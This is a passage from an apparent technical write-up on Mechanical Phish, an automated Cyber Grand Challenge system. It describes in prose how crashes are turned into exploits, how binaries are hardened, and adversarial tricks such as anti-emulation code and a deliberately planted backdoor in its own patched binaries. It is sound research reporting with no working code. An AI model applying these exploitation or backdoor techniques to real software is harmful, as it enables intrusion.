usable as a Type 2 POV. On the +other hand, a stack-based buffer overflow can clearly be used to create a +Type 1 exploit simply by setting a register and EIP, but it can also be +used to create a Type 2 exploit by using Return Oriented Programming or by +jumping to shellcode which prints data from the flag page. + +* Overview + +The basic design for Mechanical Phish's automatic exploitation is to take +crashes, triage them, and modify them to create exploits. Mechanical Phish +does not need to understand the root cause of the bug, instead it only +needs to identify what registers and memory it controls at crash time, and +how those values can be set to produce a POV. We created two systems which +are designed to go from crashes to exploits. + +- PovFuzzer + Executes the binary repeatedly, slightly modifying the input, + tracking the relationship between input bytes and registers at the + crash point. This method is fast, but cannot handle complex cases. + +- Rex + Symbolically executes the input, tracking formulas for all registers + and memory values. Applies "techniques" on this state, such as + jumping to shellcode, and return oriented programming to create a POV. + +Now this design was missing one important thing. For some challenges the +buggy functionality does not result in a crash! Consider a buffer +over-read, where it reads passed the end of the buffer. This may not cause +a crash, but if any copy of flag data is there, then it will print the +secret data. To handle this, we added a third component. + +- Colorguard + Traces the execution of a binary with a particular input and + checks for flag data being leaked out. If flag data is leaked, then + it uses the symbolic formulas to determine if it can produce a valid + POV. + + +--[ 003.001 - PovFuzzer + +The PovFuzzer takes a crash and repeatedly changes a single byte at a time +until it can determine which bytes control the EIP as well as another +register. Then a Type 1 POV can be constructed which simply chooses the +input bytes that correspond to the negotiated EIP and register values, +inserts the bytes in the payload, and sends it to the target program. + +For crashes which occur on a dereference of controlled data, the PovFuzzer +chooses bytes that cause the dereference to point to the flag page, in the +hope that flag data will be printed out. After pointing the dereference at +the flag page, it executes the program to check if flag data is printed +out. If so, it constructs a Type 2 POV using that input. + +The PovFuzzer has many limitations. It cannot handle cases where register +values are computed in a non-trivial manner, such as through +multiplication. Furthermore it cannot handle construction of more complex +exploits such as jumping to shellcode, or where it needs to replay a random +value printed by the target program. Even so, it is useful for a couple +reasons. Firstly, it is much faster than Rex, because it only needs to +execute the program concretely. Secondly, although we don't like to admit +it, angr might still have occasional bugs, and the PovFuzzer is a good +fallback in those cases as it doesn't rely on angr. + + +--[ 003.002 - Rex + +The general design of Rex is to take a crashing payload, use angr to +symbolically trace the program with the crashing payload, collecting +symbolic formulas for all memory and input along the way. Once we hit the +point where the program crashes, we stop tracing, but use the constraint +solver to pick values that either make the crash a valid POV, or avoid the +crash to explore further. There are many ways we can choose to constrain +the values at this point, each of which tries to exploit the program in a +different way. These methods of exploiting the program are called +"techniques". + +One quick thing to note here is that we include a constraint solver in our +POVs. By including a constraint solver we can simply add all of the +constraints collected during tracing and exploitation into the POV and +then ask the constraint solver at runtime for a solution that matches the +negotiated values. The constraint solver, as well as angr, operates on +bit-vectors enabling the techniques to be bit-precise. + +Here we will describe the various "techniques" which Rex employs. + +- Circumstantial Exploit + This technique is applicable for ip-overwrite crashes and is the + simplest technique. It determines if at least 20 bits of the + instruction pointer and one register are controlled by user input. If + so, an exploit is constructed that will negotiate the register and ip + values and then solve the constraints to determine the user input + that sets them correctly. + +- Shellcode Exploit + Also only applicable to ip-overwrites, this technique will search for + regions of executable memory that are controlled by user input. The + largest region of controlled executable memory is chosen and the + memory there is constrained to be a nop-sled followed by shellcode to + either prove a type-1 or type-2 vulnerability. A shellcode exploit + can function even if the user input only controls the ip value, and + not an additional register. + +- ROP Exploit + Although the stack is executable by default, opponents might employ + additional protections that prevent jumping to shellcode, such as + remapping the stack, primitive Address Randomization or even some + form of Control Flow Integrity. Return Oriented Programming (ROP) can + bypass incomplete defenses and still prove vulnerabilities for + opponents that employ them. It is applicable for ip-overwrite crashes + as long as there is user data near the stack pointer, or the binary + contains a gadget to pivot the stack pointer to the user data. + +- Arbitrary Read - Point to Flag + A crash that occurs when the program tries to dereference user- + controlled data is considered an "arbitrary read". In some cases, by + simply constraining the address that will be dereferenced to point at + flag data, the flag data will be leaked to stdout, enabling the + creation of a type-2 exploit. Point to Flag constrains the input to + point at the flag page, or at any copy of flag data in memory, then + uses Colorguard to determine if the new input causes an exploitable + leak. + +- Arbitrary Read/Write - Exploration + In some cases, the dereference of user-controlled data can lead to a + more powerful exploit later. For example, a vtable overwrite will + first appear as an arbitrary read, but if that memory address points + to user data, then the read will result in a controlled ip. To + explore arbitrary reads/writes for a better crash, the address of the + read or write is constrained to point to user data, then the input is + re-traced as a new crash. + +- Write-What-Where + If the input from the user controls both the data being written and + the address to which it is written, we want to identify valuable + targets to overwrite. This is done by symbolically exploring the + crash, to identify values in memory that influence the instruction + pointer, such as return addresses or function pointers. Other + valuable targets are pointers that are used to print data; + overwriting these can lead to type-2 exploits. + + +--[ 003.003 - Colorguard + +As explained above, there are some challenges which include +vulnerabilities that can leak flag data, but do not cause a crash. One +challenge here is that it is difficult to detect when a leak occurs. You +can check if any 4 bytes of output data are contained in the flag page, +but this will have false positives while fuzzing, and it will miss any +case where the data is not leaked directly. The challenge authors seem to +prefer to xor the data or otherwise obfuscate the leak, maybe to prevent +such a method. + +To accurately detect these leaks we chose to trace the inputs +symbolically, using angr. However, symbolic tracing is far too slow to run +on every input that the fuzzer generates. Instead, we only perform the +symbolic tracing on the inputs which the fuzzer considers "interesting". +The hope here is that the leak causing inputs have a new transition, or +number of loops which is unique, and that the fuzzer will consider it +interesting. There are definitely cases where this doesn't work, but it's +a fairly good heuristic for reducing the number of traces. + +In an effort to further combat the slowness of symbolic execution, +Colorguard takes advantage of angr's concrete emulation mode. Since no +modification of the input has to be made if a flag leak is discovered, our +input is made entirely concrete, with the only symbolic data being that +from the flag page. This allows us to only execute symbolically +those basic blocks that touch the secret flag page contents. + +Colorguard traces the entire input concretely and collects the symbolic +expression for the data that is printed to stdout. The expression is +parsed to identify any four consecutive bytes of the flag page that are +contained in the output. For each set of bytes, the solver is queried to +check if we can compute the values of the bytes only from the output data. +If so, then an exploit is crafted which solves for these four bytes after +receiving the output from the program execution. + +One caveat here is that challenges may use many bytes of the flag page as +a random seed. In these cases we might see every byte of the flag page as +part of the expression for stdout. Querying the constraint solver for +every one of these consecutive four byte sequences is prohibitively slow, +so it is necessary to pre-filter such expressions. Colorguard does this +pre-filter during the trace by replacing any expression containing more +than 13 flag bytes with a new symbolic variable. The new symbolic variable +is not considered a potential leak. The number 13 was arbitrarily chosen +as it was high enough to still detect all of the leaks we had examples for, +but low enough that checking for leaks was still fast. + + +--[ 003.004 - Challenge Response + +A common pattern that still needs to be considered is where the binary +randomly chooses a value, outputs it, and then requires the user to input +that value or something computed from the random value. For example, the +binary prints "Solve the equation: 6329*4291" and then the user must input +"27157739". To handle these patterns in the exploit, we identify any +constraints that involve both user input and random data. Once identified, +we check the output that has been printed up to that point if it contains +the random data. If so, then we have identified a challenge-response. We +will include the output as a variable in the constraints that are passed +to the exploit, and then read from stdout, adding constraints that the +output bytes match what is received during the exploit. Then the solver +can be queried to generate the input necessary for the correct "response". + + + +--[ 004 - The Patching Component: Patcherex + + Original + Binary (CB) + || + || + ||=============================================== + || || + || || + \/ \/ + -------------------- -------------------- -------------------- + | TECHNIQUES | | PATCHES | | BACKENDS | + | | | | | | + | ++++++++++++++ | | | | | + | + Return + | | - AddROData() | | | + | + Pointer + --------> - AddCode() | | +++++++++++++++ | + | + Encryption + | | - ... | | + Detour + | + | ++++++++++++++ | | | | + Backend + | + | | | | | + + | + | ++++++++++++++ | | | | +++++++++++++++ | + | + Transmit + | | - InsertCode() | | | + | + Protection + --------> - AddRWData() |==>| OR | + | + + | | - ... | | | + | ++++++++++++++ | | | | +++++++++++++++ | + | | | | | + Reassembler + | + | ++++++++++++++ | | | | + Backend + | + | + + | | - AddCode() | | + + | + | + Backdoor + --------> - AddRWData() | | +++++++++++++++ | + | + + | | - ... | | | + | ++++++++++++++ | | | | | + | | | | | | + | ... | | | | | + -------------------- -------------------- -------------------- + || + || + \/ + Replacement + Binary (RB) + + +Patcherex, which is built on top of angr, is the central patching system of +Mechanical Phish. As illustrated in the overview image, Patcherex is +composed of three major components: techniques, patches, and patching +backends. + +* Techniques + +A technique is the implementation of a high-level patching strategy. A set +of patches (described below) with respect to a binary are generated after +applying a technique on it. Currently Patcherex implements three different +types of techniques: + +- Generic binary hardening techniques, including Return Pointer Encryption, + Transmit Protection, Simple Control-Flow Integrity, Indirect Control-Flow + Integrity, Generic Pointer Encryption; +- Techniques aiming at preventing rivals from analyzing or stealing our + patches, including backdoors, anti-analysis techniques, etc.; +- Optimization techniques that make binaries more performant, including + constant propagation, dead assignment elimination, and redundant stack + variables removal. + +* Patches + +A Patch is a low-level description of how a fix or an improvement should be +made on the target binary. Patcherex defines a variety types of patches to +perform tasks ranging from code/data insertion/removal to segment altering. + +* Backends + +A backend takes patches generated from one or more techniques, and applies +them on the target binary. Two backends available in Patcherex: + +- ReassemblerBackend: this backend takes a binary, completely disassembles + the entire binary, symbolizes all code and data references among code and + data regions, and then generate an assembly file. It then apply patches + on the assembly file, and calls an external assembler (it was clang for + CGC) to reassemble the patched assembly file to the final binary. +- DetourBackend: this backend acts as a fallback to the + ReassemblerBackend. It performs in-line hooking and detouring to apply + patches. + + +--[ 004.001 - Patching Techniques + +In this section, we describe all techniques we implemented in Patcherex. + +Obviously we tried to implement techniques that will prevent exploitation +of the given CBs, by making their bugs not exploitable. In some cases, +however, our techniques do not render the bugs completely unexploitable, +but they still force an attacker to adapt its exploits to our RBs. For +instance, some techniques introduce differences in the memory layout +between our generated RB and the original CB an attacker may have used to +develop its exploit. In addition, we try to prevent attackers from adapting +exploits to our RB by adding anti-analysis techniques inside our generated +binaries. Furthermore, although we put a significant effort in minimizing +the speed and memory impact of our patches, it is often impossible to have +performance impact lower than 5% (a CB score starts to be lowered when it +has more than 5% of speed or memory overhead). For this reason we decided +to "optimize" the produced RB, as we will explain later. + +--[ 004.001.001 - Binary Hardening Techniques + +We implemented some techniques for generic binary hardening. Those general +hardening techniques, although not extremely complex, turned out to be very +useful in the CFE. + +Vulnerability-targeted hardening (targeted patching) was also planned +initially. However, due to lack of manpower and fear for deploying +replacement CBs too many times for the same challenge, we did not fully +implement or test our targeted patching strategies. + +* Return Pointer Encryption + +This technique was designed to protect from classical stack buffer +overflows, which typically give an attacker control over an overwritten +saved return pointer. Our defense mechanism "encrypts" every return pointer +saved on the stack when a function is called, by modifying the function's +prologue. The encrypted pointer is then "decrypted" before every ret +instruction terminating the same function. For encryption and decryption we +simply xor'ed the saved return pointer with a nonce (randomly generated +during program's startup). Since the added code is executed every time a +function is called, we take special care in minimizing the performance +impact of this technique. + +First of all, this technique is not applied in functions determined as +safe. We classify a function as safe if one of these three conditions is +true: + +- The function does not access any stack buffer. +- The function is called by more than 5 different functions. In this case, + we assume that the function is some standard "utility" function, and it + is unlikely that it contains bugs. Even if it contains bugs, the + performance cost of patching such a function is usually too high. +- The function is called by printf or free. Again, we assume that library + functions are unlikely to contain bugs. These common library functions + are identified by running the functions with test input and output pairs. + This function identification functionality is offered by a separate + component (the "Function identifier" mentioned in the "Warez" Section). + +To further improve the performance, the code snippet that encrypts and +decrypts the saved return pointer uses, when possible, a "free" register to +perform its computations. This avoids saving and restoring the value of a +register every time the injected code is executed. We identify free +registers (at a specific code location) by looking for registers in which a +write operation always happens before any read operation. This analysis is +performed by exploring the binary's CFG in a depth-first manner, starting +from the analyzed code location (i.e., the location where the code +encrypting/decrypting the return pointer is injected). + +Finally, to avoid negatively impacting the functionality of the binary, we +did not patch functions in which the CFG reconstruction algorithm has +problems in identifying the prologue and the epilogues. In fact, in those +cases, it could happen that if an epilogue of the analyzed function is not +identified, the encrypted return address will not be decrypted when that +epilogue is reached, and consequently the program will use the +still-encrypted return pointer on the stack as the return target. This +scenario typically happens when the compiler applies tail-call +optimizations by inserting jmp instructions at the end of a function. + +* Transmit Protection + +As a defense mechanism against Type 2 exploits, we inject code around the +transmit syscall so that a binary is forbidden from transmitting any 4 +contiguous bytes of the flag page. The injected code uses an array to +keep track of the last transmitted bytes so that it can identify cases +in which bytes of the flag page are leaked one at a time. + +* Simple Control-Flow Integrity + +To protect indirect control flow instructions (e.g., call eax, jmp ebx), we +inject, before any instruction of this kind, code that checks specific +properties of the target address (i.e., the address which the instruction +pointer will be after the call or jump). The specific checks are: + +- The target address must be an allocated address (to prevent an attacker +from using the indirect control-flow instruction to directly perform a +Type 1 attack). To do so, we try to read from the target address, so that +if the address does not point to an allocated region the program will crash +before the instruction pointer is modified. This prevents simple Type 1 +exploits, because the attacker must control at least 20 bits of the +instruction pointer, and it is unlikely (but not impossible) that the +negotiated value will end up inside an allocated memory region. + +- The target address must be inside the memory range where the binary's +code is typically loaded (for simplicity, we consider a "potential code" +address to be any below 0x4347c000). To avoid breaking programs that use +dynamically allocated code we do not perform this check if we statically +detect that the analyzed program calls the allocate syscall in a way which +will create additional executable memory. + +- The target address is not a pop instruction. As a partial mitigation +against ROP attacks, we dynamically check if the target of indirect calls +is a pop instruction, and terminate the program otherwise. + +* Uninitialized Data Cleaning + +For each function, we identify all of the instructions that read and write +to stack variables, and the stack offset that is accessed. If there is any +path through the CFG such that a stack variable is read before it is +written, then we consider it possible that there is an uninitialized data +usage. For each variable that is detected in an uninitialized data usage, +we zero that variable by adding stack cleaning code at the beginning of the +function. + +* Stack Base Address Randomization + +On program's startup we add a random value (which can assume any 16-byte +aligned value between 16 and 1024) to the stack pointer address. This adds +indeterminism to the position of the stack, hindering any exploit making +assumptions on the program's stack layout. + +* malloc Protection + +To interfere with exploitation of heap overflows, if we are able to +identify a malloc-like function inside the analyzed CB, we slightly modify +its behavior. In particular, we change the amount of bytes allocated by a +small, pseudo-random, value. + +* printf Protection + +For every printf-like function identified, such as printf, snprintf, etc., +we ensure that the function is not used to perform a "format string" +attack. Specifically, if the format string parameter is neither in the +binary's read-only memory nor a string already present in the binary, we +stop the execution of the binary if: +- The format string parameter contains a meta character (e.g., "%"). +- The format string parameter points to the flag page. + + +--[ 004.001.002 - Adversarial Techniques + +Certain techniques are introduced to prevent rivals from analyzing, or even +running our RBs in a controlled environment, while leaving those RBs still +able to run in the real game environment. These techniques are presented in +this section. + +* Anti-analysis + +We add some code, executed before the original entry point of the binary, +to interfere with analyses that other teams could perform on our patched +binary. Specifically, we add code to: +- Detect if the binary is executed using QEMU or PIN. To do so, we probe + the implementation of different aspects that are difficult to emulate + correctly, such as segment registers, transmission of partially allocated + memory regions, syscall error codes values in case of "double failure". + In addition, we add some code triggering a previously unknown + implementation bug in QEMU, making it stall. Specifically, during the + development of our CRS, we found that QEMU, when using user-mode + emulation, does not correctly handle taking the square root of an + "un-normal" floating point number, that is, a nonzero 80-bit float whose + explicit integer bit (the highest bit of the mantissa) is zero. When this + happens, QEMU will hang forever. Because of this anti-QEMU patch, some of + our RBs broke the live visualization during the CFE public event. +- Interfere with symbolic execution engines. Our adversarial code contains + self-modifying code designed to be extremely hard to simulate correctly + and efficiently by a symbolic execution engine. In addition, some added + code is specifically designed to trigger "path explosion" conditions. +- Interfere with automatic exploitation systems. We add code to transmit + the flag page to file descriptor 2 (stderr). Although data transmitted to + this file descriptor is not sent to a CRS interacting with a binary, an + opponent could mistakenly assume that any contiguous 4 bytes transmitted + from the flag page constitutes a Type 2 exploit and thus fielding a POV + trying to leverage this "fake" leak. In addition, we inject "fake + backdoor" code. This code is triggered if a CRS sends a specific 4-byte + sequence. When triggered, it reads from the CRS 8 bytes used to set the + program instruction pointer and the value of a register. For this reason, + this code looks like easily exploitable to create a Type 1 POV, however + the read values are xor'ed with a random value, before being used to set + the instruction pointer and the register, making this code + non-exploitable. + +In addition, to counteract an adversary fielding one of our own patched +binaries as its own patched binary, we inject a backdoor in every fielded +patched binary. This backdoor can be used by our CRS to exploit the patched +binary we generate, but it is designed to be extremely hard to be exploited +from other teams' CRSs. The backdoor is triggered when a specific 4-byte +sequence is received. To detect this, the function wrapping the receive +syscall is modified to keep track of the first 4 bytes a program receives. +Once triggered, the backdoor sends to the CRS a "challenge" C (which is a +19-bit value), and the CRS responds with a response R (a 64-bit value). +Then, the backdoor code checks if the following condition is true: +first_32_bits_of(SHA1(pad(R,160))) == pad(C,32), where pad(A,N) is a +function padding the input value A up to N bits by adding zeros. + +The challenge can be easily solved by pre-computing all the possible +responses, but it is impossible for an opponent's POV to compute a solution +for the challenge within the game-imposed 10-second timeout. + + +--[ 004.001.003 - Optimization Techniques + +Performance is a vital concern of our patching strategy. While we stress +the necessity of optimizing all our patching techniques, some overhead +cannot be avoided. From analyzing binaries collected from CQE and CFE +samples, we noticed that most of them are compiled with O0, i.e., without +optimization enabled. We do not know why organizers decided not to optimize +most of the provided challenges, but we speculated that this may have been +decided to leave room for optimizations and patching. + +It is well-known that O0 and O1 binaries can have a huge difference in +execution time. Fortunately, some of the optimization methods used in O1 +are not that difficult to perform directly on binaries. Further, angr +provides all necessary data-flow analysis techniques, which makes the whole +optimization development easier. Finally, with the help of the +ReassemblerBackend, we can easily fully remove instructions that we want to +get rid of, without having to replace them with nops. Therefore, we +implemented some basic in-line binary optimization techniques in order to +optimize O0 binaries in CFE, which are described below. + + +- Constant Propagation. We propagate constants used as immediates in each + instruction, and eliminate unnecessary mov instructions in assembly code. +- Dead Assignment Elimination. Many unnecessary assignments occur in + unoptimized code. For example, in unoptimized code, when a function reads + arguments passed from the stack, it will always make a copy of the + argument into the local stack frame, without checking if the argument is + modified or not in the local function. We perform a conservative check + for cases where a parameter is not modified at all in a function and the + copy-to-local-frame is unnecessary. In this case, the copy-to-local + instruction is eliminated, and all references to the corresponding + variable on the local stack frame are altered to reference the original + parameter on the previous stack frame. Theoretically, we may break the + locality, but we noticed some improvement in performance in our off-line + tests. +- Redundant Stack Variable Removal. In unoptimized code, registers are not + allocated optimally, and usually many registers end up not being used. We + perform a data-flow analysis on individual functions, and try to replace + stack variables with registers. This technique works well with variables + accessed within tight loops. Empirically speaking, this technique + contributes the most to the overall performance gain we have seen during + testing. + +Thanks to these optimizations, our patches often had *zero* overall +performance overhead. + +--[ 004.002 - Patches + +The techniques presented in the previous section return, as an output, +lists of patches. In Patcherex, a patch is a single modification to a +binary. + +The most important types of patches are: + +- InsertCodePatch: add some code that is going to be executed before an + instruction at a specific address. +- AddEntryPointPatch: add some code that is going to be executed before the + original entry point of the binary. +- AddCodePatch: add some code that other patches can use. +- AddRWData: add some readable and writable data that other patches can + use. +- AddROData: add some read-only data that other patches can use. + +Patches can refer to each other using an easy symbol system. For instance, +code injected by an InsertCodePatch can contain an instruction like call +check_function. In this example, this call instruction will call the code +contained in an InsertCodePatch named check_function. + + +--[ 004.003 - Backends + +We implemented two different backends to inject different patches. The +DetourBackend adds patches by inserting jumps inside the original code, +whereas the ReassemblerBacked adds code by disassembling and then +reassembling the original binary. The DetourBackend generates bigger (thus +using more memory) and slower binaries (and in some rare cases it cannot +insert some patches), however it is slightly more reliable than the +ReassemblerBackend (i.e., it breaks functionality in slightly less +binaries). + +* DetourBackend + +This backend adds patches by inserting jumps inside the original code. To +avoid breaking the original binary, information from the CFG of the binary +is used to avoid placing the added jmp instruction in-between two basic +blocks. The added jmp instruction points to an added code segment in which +first the code overwritten by the added jmp and then the injected code is +executed. At the end of the injected code, an additional jmp instruction +brings the instruction pointer back to its normal flow. + +In some cases, when the basic block that needs to be modified is too small, +this backend may fail applying an InsertCodePatch. This requires special +handling, since patches are not, in the general case, independent (a patch +may require the presence of another patch not to break the functionality of +a binary). For this reason, when this backend fails in inserting a patch, +the patches "depending" from the failed one are not applied to the binary. + +* ReassemblerBackend + +ReassemblerBackend fully disassembles the target binary, applies all +patches on the generated assembly, and then assembles the assembly back +into a new binary. This is the primary patching backend we used in the CFE. +Being able to fully reassemble binaries greatly reduces the performance hit +introduced by our patches, and enables binary optimization, which improves +the performance of our RBs even further. Also, reassembling usually changes +base addresses and function offsets, which achieves a certain level of +"security by obscurity" -- rivals will have to analyze our RBs if they want +to properly adapt their code-reusing and data-reusing attacks. + +We provide an empirical solution for binary reassembling that works on +almost every binary from CQE and CFE samples. The technique is open-sourced +as a component in angr, and, after the CGC competition, it has been +extended to work with generic x86 and x86-64 Linux binaries. + +A detailed explanation as well as evaluation of this technique is published +as an academic paper [Ramblr17]. + +--[ 004.004 - Patching Strategy + +We used Patcherex to generate, for every CB, three different Replacement +Binaries (RBs): + +- Detouring RB: this RB was generated by applying, using the DetourBackend, + all the patches generated by the hardening and adversarial techniques + presented previously. +- Reassembled RB: this RB was generated by applying the same patches used + by the Detouring RB, but using the ReassemblerBackend instead of the + DetourBackend. +- Optimized Reassembled RB: this RB was generated as the Reassembled one, + but, in addition all the patches generated by the optimization techniques + were added. + +These three patched RBs have been listed in order of decreasing performance +overhead and decreasing reliability. In other words, the Detouring RB is +the most reliable (i.e., it has the smallest probability of having broken +functionality), but it has the highest performance overhead with respect to +the original unpatched binary. On the contrary the Optimized Reassembled RB +is the most likely to have broken functionality, but it has a lower +performance impact. + + +--[ 004.005 - Replacement Binary Evaluation + +* Pre-CFE Evaluation + +During initial stages of Patcherex development, testing of the RBs was done +by an in-house developed component called Tester. Internally, Tester uses +cb-test, a utility provided by DARPA for testing a binary with +pre-generated input and output pairs, called polls. We made modifications +to cb-test, which enabled the testing of a binary and its associated IDS +rules on a single machine, whereas the default cb-test needs 3-machines to +test a binary with IDS rules. + +Tester can perform both performance and functionality testing of the +provided binary using the pre-generated polls for the corresponding binary +using its Makefile. For functionality testing, given a binary, we randomly +pick 10 polls and check that the binary passes all the polls. For +performance testing, we compute the relative overhead of the provided +binary against the unpatched one using all the polls. However, there was +huge discrepancy (~10%) between the performance overhead computed by us and +that provided during sparring partner sessions for the same binaries. +Moreover, during the sparring partner sessions, we also noticed that +performance numbers were different across different rounds for the same +binaries. Because of these discrepancies and to be conservative, for every +patching strategy, we computed the performance overhead as the maximum +overhead across all rounds of sparring partner sessions during which RBs +with corresponding patching strategy are fielded. + +During internal testing we used all the available binaries publicly +released on GitHub (some of which were designed for the CQE event, whereas +others were sample CFE challenges). To further extend our test cases, we +recompiled all the binaries using different compilation flags influencing +the optimization level used by the compiler. In fact, we noticed that +heavily optimized binaries (e.g., -O3), were significantly harder to +analyze and to patch without breaking functionality. Specifically, we used +the following compilations flags: -O0, -Os, -Oz, -O1, -O2, -O3, -Ofast. +Interestingly, we noticed that some of the binaries, when recompiled with +specific compilation flags, failed to work even when not patched. + +During the final stages of Patcherex development, we noticed that almost +all generated RBs never failed the functionality and that the performance +overhead was reasonable except for a few binaries. This, combined with the +discrepancy inherent in performance testing, led us not to use any in-depth +testing of our replacement binaries during the CFE. + +* CFE Evaluation + +For every RB successfully generated, Patcherex first performs a quick test +of their functionality. The test is designed to spot RBs that are broken by +the patching strategy. In particular, Patcherex only checks that every +generated RB does not crash when provided with a small test set of +hardcoded input strings ("B", "\n", "\n\n\n\n\n\n", etc.) + +We decided to perform only a minimal tests of the functionality because of +for performance and reliability considerations. + +--[ 004.006 - Qualification Round Approaches + +It is worth mentioning that for the CGC qualification round, the rules were +very different from the final round. Between this and the fact that our +analysis tools were not yet mature it was necessary for us to approach +patching very differently from the final round approaches previously +described. + +In the qualification round, the only criteria for "exploitation" was a +crash. If you could crash a binary, it meant that you could exploit it, and +if your binary could crash, it meant that you were vulnerable. Furthermore, +the qualification scoring formula was such that your "defense" score, i.e. +how many vulnerabilities your patch protected against, was a global +multiplier for your score between zero and one. This meant that if you +didn't submit a patch for a binary, or if your patch failed to protect +against any of the vulnerabilities, you received zero points for that +challenge, regardless of how well you were able to exploit it. + +This is such an unconventional scoring system that when we analyzed the +(publicly available) patches produced by other teams for the qualification +round, we found that at least one qualifying team had a patching strategy +such that whenever they discovered a crash, they patched the crashing +instruction to simply call the exit syscall. This is technically not a +crash, so the teams that did this did in fact receive defense points for +the challenges, and accordingly did in fact receive a non-negligible score +for effectively stubbing out any vaguely problematic part of the binary. + +Our approaches were slightly more nuanced! There were two techniques we +developed for the qualification round, one "general" technique, meaning +that it could be applied to a program without any knowledge of the +vulnerabilities in a binary, and one "targeted" technique, meaning that it +was applied based on our CRS' knowledge of a vulnerability. Each of the +techniques could produce several candidate patched binaries, so we had to +choose which one to submit in the end - our choice was based on some +rudimentary testing to try to ascertain if the binary could still crash, +and if not, to assess the performance impact of the patch. + +It is important to notice for CQE, the patched binaries were tested by the +organizers against a fixed set of pre-generated exploits. For this reason, +our patched binaries just had to prevent to be exploited when run against +exploit developed for the original, unpatched, version of the program. In +other words, the attacker had no way to adapt its exploits to our patches +and so "security trough obscurity" techniques were extremely effective +during the qualification event. + + +--[ 004.006.001 - Fidget + +Our "general" patching technique for CQE was a tool called Fidget. Fidget +was developed the summer prior to the announcement of the CGC for use in +attack-defense CTFs. Its basic intuition is that the development of an +attack makes a large number of very strong assumptions about the internal +memory layout of a program, so in many cases simply tweaking the layout of +stack variables is a reliable security-through-obscurity technique. + +At the time of the CQE, Fidget was a tool capable of expanding function +stack frames, putting unused space in between local variables stored on the +stack. This is clearly not sufficient to prevent crashes, as is necessary +for the strange qualification scoring formula. However, the tool had an +additional mode that could control the amount of padding that was inserted; +the mode that we used attempted to insert thousands of bytes of padding +into a single stack frame! The idea here is, of course, that no overflow +attack would ever include hundreds of bytes more than strictly necessary to +cause a crash. + +The primary issue with Fidget is that it's pretty hard to tell that +accesses to different members or indexes of a variable are actually +accesses to the same variable! It's pretty common for Fidget to patch a +binary that uses local array and struct variables liberally, and the +resulting patched binary is hilariously broken, crashing if you so much as +blow on it. There are a huge number of heuristics we apply to try not to +separate different accesses to the same variable, but in the end, variable +detection and binary type inference are still open problems. As a result, +Fidget also has a "safe mode" that does not try to pad the space in between +variables, instead only padding the space between local variables and the +saved base pointer and return address. + +We originally planned to use Fidget in the final round, since it had the +potential to disrupt exploits that overflow only from one local variable +into an adjacent one, something that none of our final-round techniques can +address. However, it was cut from our arsenal at the last minute upon the +discovery of a bug in Fidget that was more fundamental than our ability to +fix it in the limited time available! Unfortunate... + + +--[ 004.006.002 - CGrex + +If we know that it's possible for a binary to crash at a given instruction, +why don't we just add some code to check if that specific instruction would +try to access unmapped or otherwise unusable memory, and if so exit cleanly +instead of crashing? This is exactly what CGrex does. + +Our reassembler was not developed until several weeks before the CGC final +event, so for the qualification round CGrex was implemented with a +primitive version of what then became the DetourBackend. Once our CRS found +a crash, the last good instruction pointer address was sent to CGrex, which +produced a patched binary that replaced all crashing instructions with +jumps to a special inserted section that used some quirks in some syscalls +to determine if the given memory location was readable/writable/executable, +and exit cleanly if the instruction would produce a crash. + +More precisely, CGrex takes, as input, a list of POVs and a CB and it +outputs a patched CB "immune" against the provided POVs. CGrex works in +five steps: + +1) Run the CGC binary against a given POV using a modified QEMU version + with improved instruction trace logging and able to run CGC binaries. + +2) Detect the instruction pointer where the POV generates a crash (the + "culprit instruction"). + +3) Extract the symbolic expression of the memory accesses performed by the + "culprit instruction" (by using Miasm). For instance, if the crashing + instruction is mov eax, [ebx*4+2] the symbolic expression would be + ebx*4+2. + +4) Generate "checking" code that dynamically: + - Compute the memory accesses that the "culprit instruction" is going + to perform. + - Verify that these memory accesses are within allocated memory regions + (and so the "culprit instruction" is not going to crash). To + understand if some memory is allocated or not CGrex "abuses" the + return values of the random and fdwait syscalls. + + In particular these syscalls were used by passing as one of the + parameters the value to be checked. The kernel code handling these + functions verifies that, for instance, the pointer were the number of + random bytes returned by random is written is actually pointing to + writable memory and it returns a specific error code if not. CGrex + checks this error code to understand if the tested memory region is + allocated. Special care is taken so that, no matter if the tested + memory location is allocated or not, the injected syscall will not + modify the state of the program. + + - If a memory access outside allocated memory is detected, the injected + code just calls exit. + +5) Inject the "checking" code. + +Steps 1 to 5 are repeated until the binary does not crash anymore with all +the provided POVs. + + + +--[ 005 - Orchestration + + +--------+ +---------+ + CGC endpoints | TI API | | IDS tap | + +--------+ +---------+ + . . + / \ / \ + | | +-----------------------------|--------------|------------------------------ + | | + Mechanical Phish \ / \ / + ' ' + +------------+ +------------+ + | Ambassador | |Network Dude| + +------------+ +-+----------+ + | | + +------------+ +------------+ | | + | Meister | | Scriba | | | + +-----+------+ +-------+----+ | | + | | | | +--------------------------------+ + +--------+--------+ | | | Worker | + | | | | | + _----------_ | | | Poll creator AFL Driller | + ( )<---------+ | | ============ === ======= | + |`----------`|<-------------+ | Tester POV Tester POV Fuzzer | + | |<---------------+ ====== ========== ========== | + | Farnsworth | | Patcherex Colorguard Rex | + ( ) | ========= ========== === | + `----------` +--------------------------------+ + + +Designing a fully autonomous system is a challenging feat from an +engineering perspective too. In the scope of the CFE, the CRS was required +to run without fault for at least 10 hours. Although it was proposed to +allow debugging during the CFE, eventually, no human intervention was +permitted. + +To that end, we designed our CRS using a microservice-based approach. Each +logical part was split following the KISS principle ("Keep it simple, +stupid") and the Unix philosophy ("Do one thing and do it well"). + +Specifically, the separation of logical units allowed us to test and work +on every component in complete isolation. We leveraged Docker to run +components independently, and Kubernetes to schedule, deploy, and control +component instances across all 64 nodes provided to us. + + +--[ 005.001 - Components + +Several different components of Mechanical Phish interacted closely +together during the CRS (see diagram above). In the following, we will +briefly talk about the role of each component. + +* Farnsworth + + Farnsworth is a Python-based wrapper around the PostgreSQL database, and + stores all data shared between components: CBs, POVs, crashing inputs, + synchronization structures, etc. In our design, we prohibited any direct + communication between components and required them to talk "through" + Farnsworth. Therefore, Farnsworth was a potential single point of + failure. To reduce the associated risk for the CFE, we paid particular + attention to possible database problems and mitigated them accordingly. + +* Ambassador + + Ambassador was the component that talked to the CGC Team Interface (TI) + to retrieve CBs, obtain feedback, and submit RBs and POVs. In the spirit + of KISS, this component is the only part of Mechanical Phish to + communicate externally and the only source for the ground truth in + respect to the game state. + +* Meister + + Meister coordinated Mechanical Phish. For each component, a component- + specific creator decided which jobs should be run at any point in the + game, based on information obtained through Farnsworth and written by + Ambassador. Consequently, Meister decided which jobs to run based on the + priority information of each job (as specified by the creator) and usage + of the nodes in terms of CPU and memory. Note that, specifically, 